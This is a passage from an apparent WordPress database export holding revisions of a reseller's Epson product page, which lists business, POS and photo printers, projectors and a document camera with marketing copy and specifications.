slip printing, validation and endorsement print</li></ul><p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul><p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul><p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><p>Â </p><p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul><h3>ACCENT LIGHTING LASER PROJECTORS</h3><p>Epson LightScene EV-105<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"225\" height=\"150\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<ul><li>Â </li></ul><ul><li>Â </li></ul><h3>INK TANK SYSTEM</h3><ol><li>Â </li></ol><h3>LASER PRINTER</h3><ol><li>Â </li></ol><p>2.</p><p>3.Â </p><h3>POS PRINTER</h3><ol><li>Â </li></ol><ul><li>Â </li></ul><ul><li>Â </li></ul><h3>Â </h3><ul><li>Â </li></ul><p>2.Â 3.Â </p><h1>Projectors for Work</h1><p>Epson has the best projector for your business, from education solutions to conference room projectors.</p><h3>Â </h3><ul><li>Â </li></ul><ul><li>Â </li></ul><ul><li>Â </li></ul><h3>Â </h3><h3>ULTRA PORTABLE</h3><ol><li>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></li></ol><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul><h3>INTERACTIVE</h3><ol><li>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></li></ol><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><p>2.Â Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul><h3>HIGH BRIGHTNESS</h3><ol><li>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></li></ol><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul><p>2.Â Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul><p>3.Â Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul><h3>DOCUMENT CAMERAS</h3><ol><li>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></li></ol><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>To discover more, please click the button below or contact us to discuss your needs.</p><p>[maxbutton id=\"1\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 12:31:33','2018-12-24 04:31:33','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2445,1,'2018-12-18 20:47:18','2018-12-18 12:47:18','As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.\r\n<h1>Printers for Work</h1>\r\nEpson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.\r\n<h3>BUSINESS INKJET PRINTER</h3>\r\n<ol>\r\n 	<li>Epson WorkForce Enterprise WF-C17590Â <img class=\"alignnone  wp-image-2417\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></li>\r\n</ol>\r\nOur massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.\r\n<ul>\r\n 	<li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li>\r\n 	<li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li>\r\n 	<li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li>\r\n</ul>\r\n2.Â Epson WorkForce Pro WF-C5290Â <img class=\"alignnone  wp-image-2418\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" />\r\n\r\nEnjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.\r\n<ul>\r\n 	<li>High yield ink packs</li>\r\n 	<li>High-speed auto-duplex printing</li>\r\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\r\n 	<li>Epson Connect</li>\r\n 	<li>EnergyÂ saving</li>\r\n</ul>\r\n3.Â Epson WorkForce WF-100Â <img class=\"alignnone  wp-image-2419\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" />\r\n\r\nIntroducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.\r\n<ul>\r\n 	<li>Print speed up to 14 ppm</li>\r\n 	<li>Epson Connect</li>\r\n 	<li>1.44 Colour LCD Panel</li>\r\n 	<li>Wi-Fi and Wi-Fi Direct connectivity</li>\r\n 	<li>Built-in battery</li>\r\n</ul>\r\n4.Â Epson WorkForce WF-7711Â <img class=\"alignnone  wp-image-2420\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" />\r\n\r\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\r\n<ul>\r\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\r\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\r\n 	<li>Duplex printing up to A3 size</li>\r\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\r\n 	<li>4.3â€ Colour LCD Touch Panel</li>\r\n 	<li>Print, Scan, Copy Fax with ADF</li>\r\n</ul>\r\n<h3>INK TANK SYSTEM</h3>\r\n<ol>\r\n 	<li>Epson EcoTank L3150Â <img class=\"alignnone  wp-image-2421\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></li>\r\n</ol>\r\nSave more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.\r\n<ul>\r\n 	<li>Compact integrated tank design</li>\r\n 	<li>High yield ink bottles</li>\r\n 	<li>Spill-free, error-free refilling</li>\r\n 	<li>Wi-Fi, Wi-Fi Direct</li>\r\n 	<li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li>\r\n 	<li>Borderless printing up to 4R</li>\r\n</ul>\r\n2.Â Epson L120 PrinterÂ <img class=\"alignnone  wp-image-2422\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" />\r\n\r\nThe Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.\r\n<ul>\r\n 	<li>High-yield ink bottles</li>\r\n 	<li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li>\r\n 	<li>Compact Size</li>\r\n 	<li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li>\r\n</ul>\r\n3.Â Epson M1100 PrinterÂ <img class=\"alignnone  wp-image-2423\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" />\r\n\r\nEfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.\r\n<ul>\r\n 	<li>Compact integrated tank design</li>\r\n 	<li>High-yield pigment ink bottle</li>\r\n 	<li>Spill-free, error-free refilling</li>\r\n 	<li>Print speed up to 32ppm (15ipm)</li>\r\n 	<li>4 years warranty</li>\r\n</ul>\r\n<h3>LASER PRINTER</h3>\r\n<ol>\r\n 	<li>Epson AcuLaser C9300NÂ <img class=\"alignnone  wp-image-2424\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></li>\r\n</ol>\r\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\r\n<ul>\r\n 	<li>1200 x 1200 dpi</li>\r\n 	<li>Speed: Up to 30ppm</li>\r\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\r\n 	<li>Quality prints with new Epson Technologies</li>\r\n 	<li>New print job management features</li>\r\n</ul>\r\n2.Â Epson WorkForce AL-M320DNÂ <img class=\"alignnone  wp-image-2426\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" />\r\n\r\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\r\n<ul>\r\n 	<li>1200 x 1200 dpi</li>\r\n 	<li>Print speed up to 35ppm</li>\r\n 	<li>Auto-Duplex</li>\r\n 	<li>Ethernet &amp; Epson iPrint</li>\r\n 	<li>2 optional paper cassette tray</li>\r\n</ul>\r\n3.Â Epson WorkForce AL-M8100DNÂ <img class=\"alignnone  wp-image-2427\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" />\r\n\r\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\r\n<ul>\r\n 	<li>1200 x 1200 dpi</li>\r\n 	<li>Print speed up to 40 ppm</li>\r\n 	<li>Epson iPrint</li>\r\n 	<li>Ethernet</li>\r\n 	<li>4 optional cassette trays</li>\r\n</ul>\r\n<h3>POS PRINTER</h3>\r\n<ol>\r\n 	<li>Epson TM-H6000IVÂ <img class=\"alignnone  wp-image-2428\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></li>\r\n</ol>\r\nThe Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.\r\n<ul>\r\n 	<li>Thermal &amp; Dot Output</li>\r\n 	<li>Speed: Up to 300mm/sec</li>\r\n 	<li>Check printing</li>\r\n 	<li>Bi-directional printing</li>\r\n 	<li>SupportsÂ slip printing, validation and endorsement print</li>\r\n</ul>\r\n2.Â Epson TM-T88V-iÂ <img class=\"alignnone  wp-image-2429\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" />\r\n\r\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\r\n<ul>\r\n 	<li>Printing speed of up to 300mm/second</li>\r\n 	<li>20 million lines for printer mechanism</li>\r\n 	<li>Up to 2 million for auto-cutter</li>\r\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\r\n 	<li>Control peripherals easily</li>\r\n</ul>\r\n3.Â Epson TM-T70IIÂ <img class=\"alignnone  wp-image-2430\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" />\r\n\r\nThe Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.\r\n<ul>\r\n 	<li>Print method: Thermal line printing</li>\r\n 	<li>Width: 79Â Â±Â 0.5 mm</li>\r\n 	<li>Print Speed: Up to 250 mm/ sec</li>\r\n 	<li>Auto-cutter feature</li>\r\n</ul>\r\n<h3>PHOTO PRINTER</h3>\r\n<ol>\r\n 	<li>Epson L1800 PrinterÂ <img class=\"alignnone  wp-image-2431\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"243\" height=\"137\" /></li>\r\n</ol>\r\nIn creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.\r\n<ul>\r\n 	<li>Yield of up to 1,500 4R photos</li>\r\n 	<li>Print speed up to 15ppm</li>\r\n 	<li>High-yield ink bottles</li>\r\n 	<li>1-year warranty or 9,000 prints</li>\r\n</ul>\r\n2.Â Epson L850 PrinterÂ <img class=\"alignnone  wp-image-2432\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" />\r\n\r\nImaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.\r\n<ul>\r\n 	<li>High-yield ink bottles</li>\r\n 	<li>2.7 colour LCD screen</li>\r\n 	<li>Direct printing via memory card slot, USB port and PictBridge</li>\r\n 	<li>CD/DVD printing</li>\r\n 	<li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li>\r\n</ul>\r\n3.Â Epson L805 PrinterÂ <img class=\"alignnone  wp-image-2433\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" />\r\n\r\nThe L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.\r\n<ul>\r\n 	<li>Yield of Up to 1,800 4R photos</li>\r\n 	<li>Lowest Printing Costs</li>\r\n 	<li>Wi-Fi &amp; Epson iPrint</li>\r\n 	<li>CD/DVD Printing Capability</li>\r\n 	<li>1 year or 3,000 prints warranty</li>\r\n</ul>\r\n<h1>Projectors for Work</h1>\r\nEpson has the best projector for your business, from education solutions to conference room projectors.\r\n<h3><strong>CORPORATE AND EDUCATIONÂ </strong></h3>\r\n<ol>\r\n 	<li>Epson EB-2055<img class=\"alignnone  wp-image-2434\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></li>\r\n</ol>\r\nLeave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.\r\n<ul>\r\n 	<li>XGA Resolution</li>\r\n 	<li>White and Colour Light Output at 5,000 lumens</li>\r\n 	<li>Gesture Presenter</li>\r\n 	<li>Multi-PC Projection</li>\r\n 	<li>2 x HDMI</li>\r\n 	<li>Split Screen</li>\r\n</ul>\r\n2.Â Epson EB-2142WÂ <img class=\"alignnone  wp-image-2435\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\r\n\r\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\r\n<ul>\r\n 	<li>White and Colour Brightness at 4,200lm</li>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>12000 hours lamp life in eco-mode</li>\r\n 	<li>MHL-enabled</li>\r\n 	<li>Multi-PC Projection</li>\r\n 	<li>Horizontal Keystone Slider</li>\r\n 	<li>Miracast<sup>Â®</sup></li>\r\n</ul>\r\n3.Â Epson EB-L500WÂ <img class=\"alignnone  wp-image-2436\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\r\n\r\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\r\n<ul>\r\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\r\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\r\n 	<li>Laser light source of up to 20,000 hours</li>\r\n 	<li>Virtually maintenance-free for optical engine life</li>\r\n</ul>\r\n<h3>ACCENT LIGHTING LASER PROJECTORS</h3>\r\n<ol>\r\n 	<li>Epson LightScene EV-105Â <img class=\"alignnone  wp-image-2437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"225\" height=\"150\" /></li>\r\n</ol>\r\nCreate stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.\r\n<ul>\r\n 	<li>Laser projector for digital art and signage</li>\r\n 	<li>Seamlessly blends into virtually any environment</li>\r\n 	<li>Up to 20,000 hours of virtually maintenance-free operation</li>\r\n 	<li>360-degree mounting: floors, walls or ceilings</li>\r\n 	<li>Remote management and control tools</li>\r\n 	<li>Best New Award Overall</li>\r\n</ul>\r\n<h3>ULTRA PORTABLE</h3>\r\n<ol>\r\n 	<li>Epson EB-1785WÂ <img class=\"alignnone  wp-image-2438\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></li>\r\n</ol>\r\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\r\n<ul>\r\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>Real-Time Auto Keystone Correction</li>\r\n 	<li>Split Screen Projection</li>\r\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\r\n</ul>\r\n<h3>INTERACTIVE</h3>\r\n<ol>\r\n 	<li>Epson EB-536WiÂ <img class=\"alignnone  wp-image-2439\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></li>\r\n</ol>\r\nProject large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.\r\n<ul>\r\n 	<li>White and Colour Brightness at 3,400lm</li>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>Multi-PC projection</li>\r\n 	<li>HDMI Connectivity</li>\r\n 	<li>Pen Interactivity</li>\r\n</ul>\r\n2.Â Epson 595Wi/585Wi/575WiÂ <img class=\"alignnone  wp-image-2440\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" />\r\n\r\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\r\n<ul>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>White and Colour Brightness at 3,300lm</li>\r\n 	<li>Multi-PC projection</li>\r\n 	<li>HDMI Connectivity x2</li>\r\n</ul>\r\n<h3>HIGH BRIGHTNESS</h3>\r\n<ol>\r\n 	<li>Epson EB-L1405UNLÂ <img class=\"alignnone  wp-image-2441\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></li>\r\n</ol>\r\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.\r\n<ul>\r\n 	<li>White and Colour Brightness at 8,000lm</li>\r\n 	<li>WUXGA (1920 x 1200)</li>\r\n 	<li>Edge-blending to create large panoramic images</li>\r\n 	<li>Curve and corner wall projection</li>\r\n 	<li>HDBaseT</li>\r\n</ul>\r\n2.Â Epson EB-G7400UNLÂ <img class=\"alignnone  wp-image-2442\" 